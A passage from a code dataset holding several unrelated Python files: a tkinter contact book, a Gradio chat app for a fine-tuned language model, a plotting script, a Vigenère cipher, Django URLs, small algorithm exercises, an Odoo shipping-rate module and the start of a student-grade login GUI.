ms.showerror('Error', 'Name not found!')\n\n    # This Function is used to edit the Name of the contact\n    def UpdateName(self):\n        fullname = self.n_fullName.get()\n        for row in data:\n            for field in row:\n                if field == fullname:\n                    Entry(self.find, textvariable=self.n_fullName, bd=5, font=('', 15)).grid(row=4, column=1)\n        x = int()\n        mirror = False  # was 'mirror = bool', which left the duplicate check unreachable\n        full_name = self.n_fullName.get()\n        for row in data:\n            for field in row:\n                if field == self.fullname.get():\n                    mirror = True\n        if mirror == True:\n            ms.showerror('Oops!', 'A contact with the same name Already exists')\n        else:\n            while x != 1:\n                for row in data:\n                    for field in row:\n                        if field == full_name:\n                            row[0] = full_name\n                with open('ambot.csv', 'w') as wf:\n                    write_data = csv.writer(wf)\n                    for line in data:\n                        write_data.writerow(line)\n                x = 1  # terminate after one pass; this loop previously never ended\n\n    # This Function is used to edit the E-mail of the contact\n    def UpdatEmail(self):\n        fullname = self.n_fullName.get()\n        for row in data:\n            for field in row:\n                if field == fullname:\n                    Entry(self.find, textvariable=self.n_email, bd=5, font=('', 15)).grid(row=5, column=1)\n        x = int()\n        full_name = self.n_fullName.get()\n        email_info = self.n_email.get()\n        while x != 1:\n            for row in data:\n                for field in row:\n                    if field == full_name:\n                        row[1] = email_info\n                        x = 1\n        with open('ambot.csv', 'w') as wf:\n            write_data = csv.writer(wf)\n            for line in data:\n                write_data.writerow(line)\n\n    # This Function is used to edit the Mobile number of the contact\n    def UpdateMobile(self):\n        fullname = self.n_fullName.get()\n        for row in data:\n            for field in row:\n                if field == fullname:\n                    Entry(self.find, textvariable=self.n_mobile, bd=5, font=('', 15)).grid(row=6, column=1)\n        x = int()\n        full_name = self.n_fullName.get()\n        mobile = self.n_mobile.get()\n        while x != 1:\n            for row in data:\n                for field in row:\n                    if field == full_name:\n                        row[3] = mobile\n                        x = 1\n        with open('ambot.csv', 'w') as wf:\n            write_data = csv.writer(wf)\n            for line in data:\n                write_data.writerow(line)\n\n    # This Function is used to edit the Work number of the contact\n    def UpdateWork(self):\n        fullname = self.n_fullName.get()\n        for row in data:\n            for field in row:\n                if field == fullname:\n                    Entry(self.find, textvariable=self.n_work, bd=5, font=('', 15)).grid(row=7, column=1)\n\n        x = int()\n        full_name = self.n_fullName.get()\n        work = self.n_work.get()\n        while x != 1:\n            for row in data:\n                for field in row:\n                    if field == full_name:\n                        row[4] = work\n                        x = 1\n        with open('ambot.csv', 'w') as wf:\n            write_data = csv.writer(wf)\n            for line in data:\n                write_data.writerow(line)\n\n    # This Function is used to edit the Home number 
of the contact\n def UpdateHome(self):\n fullname = self.n_fullName.get()\n for row in data:\n for field in row:\n if field == fullname:\n Entry(self.find, textvariable=self.n_home, bd=5, font=('', 15)).grid(row=8, column=1)\n x = int()\n full_name = self.n_fullName.get()\n home = self.n_home.get()\n while x != 1:\n for row in data:\n for field in row:\n if field == full_name:\n row[5] = home\n x = 1\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n\n # This Function is used to write the manipulated database list to an external database\n def update_writer(self):\n ms.showinfo('Success!', 'Contact Updated')\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n root.destroy()\n\n print(data)\n\n # This Function is used to Delete a certain contact\n def Delete(self):\n full_name = self.n_fullName.get()\n for row in data:\n for field in row:\n if full_name == field:\n data.remove(row)\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n print(data)\n ms.showinfo('Success!', 'Contact Deleted')\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n root.destroy()\n\n # This Function is used to add Contacts and to append a certain data to the global variable\n def add_contacts(self):\n print(data)\n mobile = str()\n work = str()\n home = str()\n mirror = bool\n fullname = self.fullname.get()\n for row in data:\n for field in row:\n if field == self.fullname.get():\n mirror = True\n if mirror == True:\n ms.showerror('Oops!', 'A contact with the same name Already exists')\n else:\n email = self.email.get()\n type = self.var.get()\n id = uuid.uuid4()\n print(type)\n if type == 'Mobile':\n mobile = self.number.get()\n print(mobile)\n work = 'None'\n home = 'None'\n elif type == 'Work':\n work = self.number.get()\n print(work)\n mobile = 'None'\n home = 'None'\n elif type == 'Home':\n home = self.number.get()\n print(home)\n mobile = 'None'\n work = 'None'\n with open('ambot.csv', 'a') as rf:\n fieldnames = ['FULL_NAME', 'EMAIL', 'ID', 'MOBILE', 'WORK', 'HOME']\n n = csv.DictWriter(rf, fieldnames=fieldnames)\n n.writerow(\n {'FULL_NAME': fullname, 'EMAIL': email, 'ID': id, 'MOBILE': mobile, 'WORK': work, 'HOME': home, })\n \n\n ms.showinfo('Success!', 'Contact Added')\n root.destroy()\n\n # This Functions are used to setup the Packing methods of the widgets for the GUI\n def main(self):\n self.n_fullName.set('')\n self.n_email.set('')\n self.create.pack_forget()\n self.head['text'] = 'Select Your Choice'\n self.home.pack()\n\n def add(self):\n self.n_fullName.set('')\n self.n_email.set('')\n self.home.pack_forget()\n self.head['text'] = 'ADD NEW CONTACT'\n self.create.pack()\n\n def search(self):\n self.n_fullName.set('')\n self.n_email.set('')\n self.home.pack_forget()\n self.create.pack_forget()\n self.find.pack_forget()\n self.head['text'] = 'SEARCH CONTACT'\n self.find.pack()\n\n # This is used to setup the interface\n def widgets(self):\n # entry part\n self.head = Label(self.master, text=\"\\n \\n Huawei Numbawan \\n \\n\", font=('', 24), fg= '#970af5')\n self.head.configure(background = 'Yellow') \n self.head.pack()\n Label(self.master, text=\"\", bg = '#970af5').pack()\n\n ##------- HOME --------##\n self.home = Frame(self.master, padx=10, pady=1, bg = '#970af5')\n # buttons part\n Button(self.home, text='\\n Search Contacts \\n', bd=3,fg = 
'#970af5', bg = 'Light Pink', font=('', 14), padx=5, pady=5, command=self.search).pack()\n Label(self.home, text=\"\", bg = '#970af5').pack()\n Button(self.home, text='\\n Add Contacts \\n', bd=3,fg = '#970af5', bg = 'Light Pink', font=('', 14), padx=5, pady=5, command=self.add).pack()\n Label(self.home, text=\"\", bg = '#970af5').pack()\n self.home.pack()\n ##------- ADD CONTACTS --------##\n self.create = Frame(self.master, padx=10, pady=10, bg = '#970af5')\n Label(self.create, text=' Enter Full Name:\\n', font=('', 15), pady=0, padx=0, bg= 'Yellow', fg = '#970af5').grid(sticky=W, row=2, column=0)\n Entry(self.create, textvariable=self.fullname, bd=5, font=('', 15)).grid(row=2, column=1)\n\n Label(self.create, text=' Enter E-mail Address:\\n', font=('', 15), pady=0, padx=0, bg= 'Yellow', fg = '#970af5').grid(sticky=W)\n Entry(self.create, textvariable=self.email, bd=5, font=('', 15)).grid(row=3, column=1)\n\n Label(self.create, text=' Enter Number:\\n', font=('', 15), pady=0, padx=0, bg= 'Yellow', fg = '#970af5').grid(sticky=W)\n Label(self.create, text='Type:', font=('', 15), pady=5, padx=5, bg= 'Yellow', fg = '#970af5').grid(row=4,column = 2)\n OptionMenu(self.create, self.var, *self.optionList).grid(row=4, columnspan=2, column = 3)\n Entry(self.create, textvariable=self.number, bd=5, font=('', 15)).grid(row=4, column=1)\n\n Label(self.create, text='', bg='#970af5').grid(sticky=W)\n\n Button(self.create, text='Add Contact', bg= 'Yellow', fg = '#970af5', bd=3, font=('', 15), padx=5, pady=5, command=self.add_contacts).grid(\n row=8, columnspan=4)\n ##------- SEARCH --------##\n self.find = Frame(self.master, padx=10, pady=10, bg = '#970af5')\n Label(self.find, text=' Enter Full Name: ', font=('', 15), pady=5, padx=5, bg= 'Yellow', fg = '#970af5').grid(sticky=W, row=2, column=0)\n Entry(self.find, textvariable=self.n_fullName, bd=5, font=('', 15)).grid(row=2, column=1)\n Button(self.find, text='Search', bg= 'Yellow', fg = '#970af5', bd=3, font=('', 15), padx=0, pady=0, command=self.search_contacts).grid(\n column=2, row=2)\n\n\n# Runs the GUI\nroot = Tk()\nroot.configure(bg= '#970af5')\nmain(root)\nroot.title(\"Phone\")\nroot.mainloop()","repo_name":"kyle1200434/DatabaseGUI","sub_path":"kyleGUI.py","file_name":"kyleGUI.py","file_ext":"py","file_size_in_byte":15875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29364223894","text":"import gradio as gr\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, pipeline, StoppingCriteria, StoppingCriteriaList, TextIteratorStreamer\nfrom huggingface_hub import HfFolder\nimport time\nimport numpy as np\nfrom torch.nn import functional as F\nimport os\nfrom threading import Thread\nfrom context_builder import build_user_context\n\nfrom peft import (\n LoraConfig,\n get_peft_model,\n prepare_model_for_int8_training,\n TaskType,\n PeftConfig,\n PeftModel\n)\n\n\nprint(f\"Starting to load the model to memory\")\n\n\nUSER_TOKEN = '<|USER|>'\nASSISTANT_TOKEN = '<|ASSISTANT|>'\n\nHfFolder.save_token(os.getenv(\"HF_TOKEN\"))\npeft_model_id = \"rjac/temp_modelv3\"\nconfig = PeftConfig.from_pretrained(peft_model_id)\n# Custom One\ntokenizer = AutoTokenizer.from_pretrained(peft_model_id,use_auth_token=True)\n# tokenizer = AutoTokenizer.from_pretrained(config.base_model_name_or_path)\nlanguage_model = AutoModelForCausalLM.from_pretrained(\n config.base_model_name_or_path,\n load_in_8bit=True,\n device_map='auto',\n torch_dtype=torch.float16,\n)\n\nlanguage_model = 
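Every edit path in the contact book above rewrites ambot.csv by hand. A compact sketch of that load/modify/save round trip, using the same file name and the newline='' guard the csv module documentation recommends (an illustration, not the original code):

import csv

def load_contacts(path="ambot.csv"):
    with open(path, newline="") as f:
        return [row for row in csv.reader(f) if row]  # skip blank rows, as above

def save_contacts(rows, path="ambot.csv"):
    with open(path, "w", newline="") as f:
        csv.writer(f).writerows(rows)

contacts = load_contacts()
contacts.append(["Jane Doe", "jane@example.com", "some-id", "555-0100", "None", "None"])
save_contacts(contacts)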
PeftModel.from_pretrained(language_model, peft_model_id)\n\nprint(f\"Sucessfully loaded the model to the memory\")\n\nstart_message = \"\"\"<|SYSTEM|># Nutrition Assistant: Answer questions related to Senza nutrition app, using the context provided within triple backticks.\\nIf a question is unrelated to the app, respond: I am sorry, I\\'m afraid I cannot answer that question.\\n```\\n{}\\n```\\n\"\"\"\n\nclass StopOnTokens(StoppingCriteria):\n def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor, **kwargs) -> bool:\n #stop_ids = [50278, 50279, 50277, 1, 0] # TODO: Verify what tokens are this\n stop_ids = [535, 50277, 50278, 50279, 1, 0]\n #stop_ids = [1, 0]\n for stop_id in stop_ids:\n if input_ids[0][-1] == stop_id:\n return True\n return False\n\ndef user(message, history):\n # Append the user's message to the conversation history\n # return \"\", history + [[message, \"\"]]\n # return \"\", history[-1:] + [[message, \"\"]]\n return \"\", [[message, \"\"]]\n\n\ndef chat(curr_system_message, history):\n # Initialize a StopOnTokens object\n stop = StopOnTokens()\n\n system_message = start_message.format(curr_system_message)\n # Construct the input message string for the model by concatenating the current system message and conversation history\n messages = system_message + \\\n \"\".join([\"\".join([USER_TOKEN+item[0], ASSISTANT_TOKEN+item[1]]) for item in history])\n print(messages)\n # Tokenize the messages string\n model_inputs = tokenizer([messages], return_tensors=\"pt\").to(\"cuda\")\n streamer = TextIteratorStreamer(tokenizer, timeout=30., skip_prompt=True, skip_special_tokens=True)\n generate_kwargs = dict(\n model_inputs,\n streamer=streamer,\n max_new_tokens=350,\n do_sample=True,\n top_p=0.95,\n top_k=1000,\n temperature=1.00,\n num_beams=1,\n stopping_criteria=StoppingCriteriaList([stop])\n )\n t = Thread(target=language_model.generate, kwargs=generate_kwargs)\n t.start()\n\n # print(history)\n # Initialize an empty string to store the generated text\n partial_text = \"\"\n for new_text in streamer:\n # print(new_text)\n partial_text += new_text\n history[-1][1] = partial_text\n # Yield an empty string to cleanup the message textbox and the updated conversation history\n yield history\n return partial_text\n\n\ndef user_context(user_id):\n user_info = build_user_context(user_id)\n return user_info\n\nwith gr.Blocks() as demo:\n # history = gr.State([])\n gr.Markdown(\"## StableLM-Senza-alpha-7b Chat\")\n\n with gr.Row():\n\n user_id_holder = gr.Textbox(\n label=\"User ID\",\n placeholder=\"####\",\n show_label=True\n ).style(container=False) \n\n search_user_info = gr.Button(\"Search\")\n\n system_msg = gr.Textbox(\n \"User Info\",\n label=\"System Message\",\n interactive=False,\n visible=True\n )\n\n\n with gr.Row():\n with gr.Column(): \n msg = gr.Textbox(\n label=\"Chat Message Box\",\n placeholder=\"Chat Message Box\",\n show_label=False\n ).style(container=False)\n \n with gr.Column():\n with gr.Row():\n submit = gr.Button(\"Submit\")\n stop = gr.Button(\"Stop\")\n clear = gr.Button(\"Clear\")\n\n chatbot = gr.Chatbot().style(height=350)\n\n\n search_user_info_event = search_user_info.click(fn=user_context, inputs=[user_id_holder],outputs=[system_msg], queue=False)\n\n\n submit_event = msg.submit(\n fn=user, inputs=[msg, chatbot], outputs=[msg, chatbot], queue=False\n ).then(\n fn=chat, inputs=[system_msg, chatbot], outputs=[chatbot], queue=True\n )\n\n submit_click_event = submit.click(\n fn=user, inputs=[msg, chatbot], outputs=[msg, chatbot], 
queue=False\n ).then(\n fn=chat, inputs=[system_msg, chatbot], outputs=[chatbot], queue=True\n )\n \n stop.click(\n fn=None, inputs=None, outputs=None, cancels=[submit_event, submit_click_event], queue=False\n )\n \n clear.click(lambda: None, None, [chatbot], queue=False)\n\ndemo.queue(max_size=32, concurrency_count=6)\ndemo.launch(server_name=\"0.0.0.0\")\n","repo_name":"jr4c/transformer-chat-ui","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4913371902","text":"# collect data\nfrom lightexperiments.light import Light\nlight = Light(dict(read_only=True))\nlight.launch()\ndata = light.experiments.filter(\n lambda obj:(\"lambda\" in obj and\n \"tags\" in obj and\n \"sanity_check_big_lambda\" in obj[\"tags\"])\n)\n#for i in range(len(data)):\n# light.experiments.delete(data[i][\"__id\"])\nlight.close()\ndata = sorted(data, key=lambda d:d[\"lambda\"])\nprint(len(data))\ndata = data[0::2]\n\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nfor i, d in enumerate(data):\n# print(d[\"lambda\"])\n# print(d[\"loss_ensemble_machine\"])\n loss_ensemble_machine = (np.array(d[\"loss_ensemble_machine\"]))\n loss_accuracy = np.array(d[\"loss_accuracy\"])\n accuracy = np.array(d[\"accuracy\"])\n loss = np.array(d[\"loss\"])\n\n #loss_ensemble_machine = ((loss_ensemble_machine - loss_ensemble_machine.min())/\n # (loss_ensemble_machine.max() - loss_ensemble_machine.min()))\n #loss_accuracy = ((loss_accuracy - loss_accuracy.min())/\n # (loss_accuracy.max() - loss_accuracy.min()))\n #accuracy = ((accuracy - accuracy.min())/\n # (accuracy.max() - accuracy.min()))\n\n\n plt.subplot(len(data), 2, i*2 + 1)\n plt.plot(loss_ensemble_machine, label=\"MDS loss\", c='blue')\n plt.legend()\n plt.subplot(len(data), 2, i*2 + 2)\n plt.plot(accuracy, label=\"accuracy\", c='red')\n plt.legend()\n #plt.plot(loss, label=\"loss\")\n #plt.plot(accuracy)\n# plt.plot(d[\"loss_accuracy\"])\n# plt.plot(d[\"accuracy\"])\n plt.title(\"lambda=%F\" % (d[\"lambda\"]))\n plt.legend()\n#plt.tight_layout(pad=0.1, w_pad=0.1, h_pad=0.5)\n#plt.figlegend( lines, labels, loc = 'lower center', ncol=5, labelspacing=0. 
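The chat handler above pairs TextIteratorStreamer with a worker thread: generate() runs in the background while the caller iterates over decoded chunks. The same pattern in isolation (the model name is chosen only for this sketch):

from threading import Thread
from transformers import AutoModelForCausalLM, AutoTokenizer, TextIteratorStreamer

tokenizer = AutoTokenizer.from_pretrained("gpt2")
model = AutoModelForCausalLM.from_pretrained("gpt2")
inputs = tokenizer(["Hello"], return_tensors="pt")
streamer = TextIteratorStreamer(tokenizer, skip_prompt=True, skip_special_tokens=True)
Thread(target=model.generate, kwargs=dict(inputs, streamer=streamer, max_new_tokens=20)).start()
for chunk in streamer:  # yields text pieces as they are generated
    print(chunk, end="", flush=True)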
)\nplt.show()\n","repo_name":"mehdidc/ensemble_machine","sub_path":"ramp/ramp_plot.py","file_name":"ramp_plot.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"72287489067","text":"#########################################################\n#Name: Thalla Divya\n#Class: CMPS 5363 Cryptography\n#Date: 29th July 2015\n#Program 2 - Randomized Vigenere Cipher\n#########################################################\nimport random\nimport sys\n\n#Generates a random matrix\ndef buildVigenere(seed):\n    random.seed(seed)\n    # 95 printable ASCII symbols; a stray duplicate space after ']' has been removed\n    symbols = \"\"\" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\"\"\"\n    n = len(symbols)\n    vigenere = [[0 for i in range(n)] for i in range(n)]\n    symbols = list(symbols)\n    random.shuffle(symbols)\n    symbols = ''.join(symbols)\n    \n    for sym in symbols:\n        random.seed(seed)\n        myList = []\n        \n        for i in range(n):\n            r = random.randrange(n)\n            \n            if r not in myList:\n                myList.append(r)\n            else:\n                while(r in myList):\n                    r = random.randrange(n)\n                \n                myList.append(r)\n            \n            while(vigenere[i][r] != 0):\n                r = (r + 1) % n\n            \n            vigenere[i][r] = sym\n    \n    return vigenere\n\n#Prints a randomized vigenere matrix, one row per line\ndef printMatrix(vigenere):\n    for row in vigenere:\n        print(''.join(row))\n\n#############################################################\n\n#Encrypts the message with the key and seed value\ndef encrypt(message,seed):\n\tkey=keywordFromseed(seed)\n\tvigenere=buildVigenere(seed)\n\tcipherText = \"\"\n\tfor i in range(len(message)):\n\t\tmi = i\n\t\tki = i % len(key)\n\t\tcol = ord(message[mi]) - 32\n\t\trow = ord(key[ki]) - 32\n\t\tcipherText = cipherText + vigenere[row][col]\n\treturn cipherText\n\n\n#Decrypts the message with the key and seed value\ndef d_decrypt(cipherText,seed):\n\tDecText = \"\"\n\tkey=keywordFromseed(seed)\n\tvigenere=buildVigenere(seed)\n\tfor i in range(len(cipherText)):\n\t\temi = i\n\t\tki = i % len(key)\n\t\tDecText = DecText + decrypt(cipherText,key,ki,emi,vigenere)\n\treturn DecText\n\n#-------------------------------------------------------------------- \ndef decrypt(cipherText,key,ki,emi,vigenere):\n\trow = ord(key[ki])-32\n\t# scan the key's row for the cipher symbol; its column index is the plaintext code\n\tfor i in range(len(vigenere[row])):\n\t\tif cipherText[emi]==vigenere[row][i]:\n\t\t\treturn chr(i+32)\n\n#keyword is generated from seed\ndef keywordFromseed(seed):\n    Letters = []\n    \n    while seed > 0:\n        Letters.insert(0,chr((seed % 100) % 26 + 65))\n        seed = seed // 100\n    return ''.join(Letters)\n","repo_name":"divyathalla/CMPS-Cryptography-Divya","sub_path":"divya.thalla.vigenere/randomized_vigenere.py","file_name":"randomized_vigenere.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"70708601974","text":"from django.conf.urls import url, include\nfrom .views import all_issues, add_issue, edit_issue, upvote\n\nurlpatterns = [\n    url(r'^$', all_issues, name = 'issues'),\n    url(r'^addissue/$', 
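With the duplicate space removed from the symbol table above, every tableau row is a permutation of the 95 printable ASCII characters, so decryption inverts encryption exactly. A round-trip check, assuming the functions defined above:

seed = 20150729  # any positive integer; it fixes both the tableau and the keyword
plaintext = "Attack at dawn!"
ciphertext = encrypt(plaintext, seed)
assert d_decrypt(ciphertext, seed) == plaintext
print(repr(ciphertext))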
add_issue, name = 'addissue'),\n    url(r'^(?P<id>\d+)/editissue/$', edit_issue, name = 'editissue'),\n    url(r'^(?P<id>\d+)/upvote/$', upvote, name='upvote'),\n    ]\n\n\n\n\n","repo_name":"jonw83/issue-tracker-jw","sub_path":"issues/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86745536687","text":"import sys\ninput = sys.stdin.readline\n# N is the number of ropes; K stores the maximum weight each rope can bear.\nN = int(input())\nK = [int(input()) for _ in range(N)]\nK.sort()\n#print(K)\n# The more ropes used, the less weight each rope must bear, so more ropes helps.\n# But a rope with a very low capacity may be better left out.\n# Is the weakest rope's capacity * the number of ropes then the best answer?\n# If not, drop the weakest rope and try the next weakest rope's capacity * (N-1).\nM = K[0] * N # M holds the current maximum bearable weight\nn = N # number of ropes currently in use\nfor i in range(1, N):\n    if M <= K[i]*(n-1):\n        #print(M, K[i]*(n-1))\n        M = K[i]*(n-1)\n        n -= 1\n    else:\n        #print(M, K[i]*(n-1))\n        n -= 1\nprint(M)","repo_name":"STkangyh/VacationAlgorithmClass","sub_path":"Baekjun/Silver/2217.py","file_name":"2217.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29502473266","text":"from functools import reduce\n_sum = reduce((lambda x, y: x + y), [1, 2, 3, 4]) # 10\nprint(_sum)\n# of course, it is much better to just use sum:\n_sum = sum([1, 2, 3, 4]) # 10\nprint(_sum)\n\n\nalist = [(2, 2, 3), (1, 1), (1, 3, 3, 4)]\nalist = sorted(alist, key=lambda x: x[0])\n# sort by the first element of each tuple\nprint(alist) # [(1, 1), (1, 3, 3, 4), (2, 2, 3)]\n","repo_name":"Pro1ooEgor/exercise","sub_path":"NEW/reduce_lambda_in_sorted_key.py","file_name":"reduce_lambda_in_sorted_key.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73246928374","text":"from openerp import models, fields, api, _\nfrom openerp import netsvc\n\n\nclass shipping_rate_card(models.Model):\n    _name = 'shipping.rate.card'\n    _description = \"Ground Shipping Calculation Table\"\n    name = fields.Char(string='Name', size=128, required=True)\n    from_date = fields.Datetime(string='From Date')\n    to_date = fields.Datetime(string='To Date')\n    rate_ids = fields.One2many('shipping.rate', 'card_id', string='Shipping Rates', required=True)\n\n\nclass shipping_rate_config(models.Model):\n    _name = 'shipping.rate.config'\n    _description = \"Configuration for shipping rate\"\n    _rec_name = 'shipmethodname'\n    real_id = fields.Integer(string='ID', readonly=True)\n    shipmethodname = fields.Char(string='Name', size=128, help='Shipping method name. Displayed in the wizard.')\n    active = fields.Boolean(string='Active', help='Indicates whether a shipping method is active')\n    use = fields.Boolean(string='Select')\n    calc_method = fields.Selection([('country_weight', 'Country & Weight'),\n                                    ('state_zone_weight', 'State-Zone-Weight'),\n                                    ('manual', 'Manually Calculate')],\n                                    string='Shipping Calculation Method',\n                                    default='country_weight',\n                                    help='How the shipping cost is computed. 
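The greedy argument in the rope problem above compresses to one line: after sorting, treating the i-th lightest rope as the weakest of the remaining n-i ropes supports K[i]*(n-i), and the answer is the maximum over i. This is equivalent to the loop above:

K_sorted = sorted([10, 15, 3])
best = max(k * (len(K_sorted) - i) for i, k in enumerate(K_sorted))
print(best)  # 20: drop the weakest rope and lift 10 * 2 with the two stronger ones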
Displayed in the wizard.')\n    shipping_wizard = fields.Integer(string='Shipping Wizard')\n    zone_map_ids = fields.One2many('zone.map', 'rate_config_id', string='Zone Map')\n    account_id = fields.Many2one('account.account', string='Account', help='This account represents the g/l account for booking shipping income.')\n    shipment_tax_ids = fields.Many2many('account.tax', 'shipment_tax_rel', 'shipment_id', 'tax_id', string='Taxes', domain=[('parent_id', '=', False)])\n    rate_card_id = fields.Many2one('shipping.rate.card', string='Shipping Rate Card')\n\n\nclass zone_map(models.Model):\n    _name = 'zone.map'\n    _description = \"Zone Mapping Table\"\n    _rec_name = 'zone'\n    zone = fields.Integer(string='Zone')\n    state_id = fields.Many2one('res.country.state', string='State / Zone')\n    rate_config_id = fields.Many2one('shipping.rate.config', string='Shipping Rate Configuration')\n\n\nclass shipping_rate(models.Model):\n    _name = 'shipping.rate'\n    _description = \"Shipping Calculation Table\"\n    name = fields.Char(string='Name', size=128)\n    from_weight = fields.Integer(string='From Weight', required=True)\n    to_weight = fields.Integer(string='To Weight')\n    charge = fields.Float(string='Shipping Charge')\n    over_cost = fields.Float(string='Shipping Charge per pound over')\n    country_id = fields.Many2one('res.country', string='Country')\n    zone = fields.Integer(string='Zone', required=True)\n    card_id = fields.Many2one('shipping.rate.card', string='Shipping Table')\n\n    def find_cost(self, config_id, address, model_obj):\n        \"\"\"\n        Function to calculate shipping cost\n        \"\"\"\n        cost = 0\n        table_env = self.env['shipping.rate']\n        config_env = self.env['shipping.rate.config']\n        # logger = netsvc.Logger()\n        config_obj = config_env.browse(config_id)\n        rate_card_id = config_obj.rate_card_id.id\n\n        if config_obj.calc_method == 'country_weight':\n            country_id = address.country_id.id\n            weight_net = model_obj.total_weight_net\n            table_ids = table_env.search([('card_id', '=', rate_card_id), ('country_id', '=', country_id),\n                                          ('from_weight', '<=', weight_net), ('to_weight', '>', weight_net)])\n            if table_ids:\n                table_obj = table_env.browse(table_ids)[0]\n                if table_obj.charge == 0.0 and table_obj.over_cost:\n                    cost = model_obj.total_weight_net * table_obj.over_cost\n                else:\n                    cost = table_obj.charge\n            else:\n                search_list = [('card_id', '=', rate_card_id), ('country_id', '=', country_id), ('over_cost', '>', 0)]\n                table_ids = table_env.search(search_list)\n                if table_ids:\n                    table_objs = table_env.browse(table_ids)\n                    table_obj = table_objs[0]\n                    for table in table_objs:\n                        if table_obj.from_weight < table.from_weight:\n                            table_obj = table\n                    weight = model_obj.total_weight_net\n                    if table_obj.charge > 0:\n                        cost = table_obj.charge\n                        weight -= table_obj.from_weight\n                        if weight > 0:\n                            cost += weight * table_obj.over_cost\n                    else:\n                        cost = weight * table_obj.over_cost\n#            else:\n#                logger.notifyChannel(_(\"Calculate Shipping\"), netsvc.LOG_WARNING, _(\"Unable to find rate table with Shipping Table = %s and \\\n#                         Country = %s and Over Cost > 0.\"%(config_obj.rate_card_id.name, address.country_id.name)))\n\n        elif config_obj.calc_method == 'state_zone_weight':\n            zone_env = self.env['zone.map']\n            state_id = address.state_id.id\n            zone_ids = zone_env.search([('rate_config_id', '=', config_obj.id), ('state_id', '=', state_id)])\n            if zone_ids:\n                # read the zone number from the first matching mapping\n                # (was: zone = zone_env.read(['zone'])[0], which produced a dict, not an integer)\n                zone = zone_env.browse(zone_ids)[0].zone\n                table_ids = table_env.search([('card_id', '=', rate_card_id), ('zone', '=', zone)])\n                if table_ids:\n                    table_obj = table_env.browse(table_ids)[0]\n                    weight = model_obj.total_weight_net\n                    if table_obj.charge > 0:\n                        cost = table_obj.charge\n                        weight -= table_obj.to_weight\n                        if weight > 0:\n                            cost += weight * table_obj.over_cost\n                    else:\n                        cost = weight * table_obj.over_cost\n#                else:\n#                    logger.notifyChannel(_(\"Calculate Shipping\"), netsvc.LOG_WARNING, _(\"Unable to find rate table with Shipping Table = %s and \\\n#                         Zone = %s.\"%(config_obj.shipmethodname, zone)))\n#            else:\n#                logger.notifyChannel(_(\"Calculate Shipping\"), netsvc.LOG_WARNING, _(\"Unable to find Zone Mapping Table with Shipping Rate \\\n#                    Configuration = %s and State = %s.\"%(config_obj.shipmethodname, address.state_id.name)))\n        elif config_obj.calc_method == 'manual':\n            cost = 0.0\n        return cost\n\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"JayVora-SerpentCS/OdooUSA","sub_path":"sale_negotiated_shipping/sale_negotiated_shipping.py","file_name":"sale_negotiated_shipping.py","file_ext":"py","file_size_in_byte":6727,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
{"seq_id":"8995126456","text":"# Preface\n# This system uses GUI programming to build a friendly visual interface\n# Adds a feature to display the whole class's grades directly\n# Adds a login feature to keep the data safer\n# Adds operations for modifying student grades (add, delete)\n\nimport csv\nimport tkinter\nimport os\nfrom tkinter.messagebox import showinfo\nfrom tkinter.ttk import *\nfrom tkinter import messagebox\nfrom tkinter import StringVar\nfrom matplotlib import pyplot as plt  # uncommented: plt is required by view() below\n\n\nclass Login(object):\n    def __init__(self):\n        # Create the main window that holds the other widgets\n        self.root = tkinter.Tk()\n        # Set the main window title\n        self.root.title(\"学生成绩分析系统\")\n        self.root.geometry('750x550')\n        # Remember to provide a gif image file before running, otherwise this fails\n        self.canvas = tkinter.Canvas(self.root, height=535, width=734, bd=10) # create the canvas\n        self.image_file = tkinter.PhotoImage(file='tu1.gif') # load the image file\n        self.image = self.canvas.create_image(0, 0, anchor='nw', image=self.image_file) # place the image on the canvas\n        self.canvas.pack(side='top') # place the canvas (top)\n\n        # Create a label for the account field\n        self.label_account = tkinter.Label(self.root, text='账号: ')\n        # Create a label for the password field\n        self.label_password = tkinter.Label(self.root, text='密码: ')\n\n        # Create the account entry and set its size\n        self.input_account = tkinter.Entry(self.root, width=15)\n        # Create the password entry and set its size\n        self.input_password = tkinter.Entry(self.root, show='*', width=15)\n\n        # Create the login button\n        self.login_button = tkinter.Button(self.root, command=self.login_sys, text=\"登录\", width=10)\n\n        # Finish the layout\n\n    def gui_arrang(self):\n        self.label_account.place(x=60, y=480)\n        self.label_password.place(x=290, y=480)\n        self.input_account.place(x=135, y=480)\n        self.input_password.place(x=350, y=480)\n        self.login_button.place(x=550, y=480)\n\n    # Validate the login credentials\n    def login_sys(self):\n        account = self.input_account.get().ljust(9, \" \")\n        password = self.input_password.get().ljust(6, \" \")\n        if account == '190350120' and password == '123456':\n            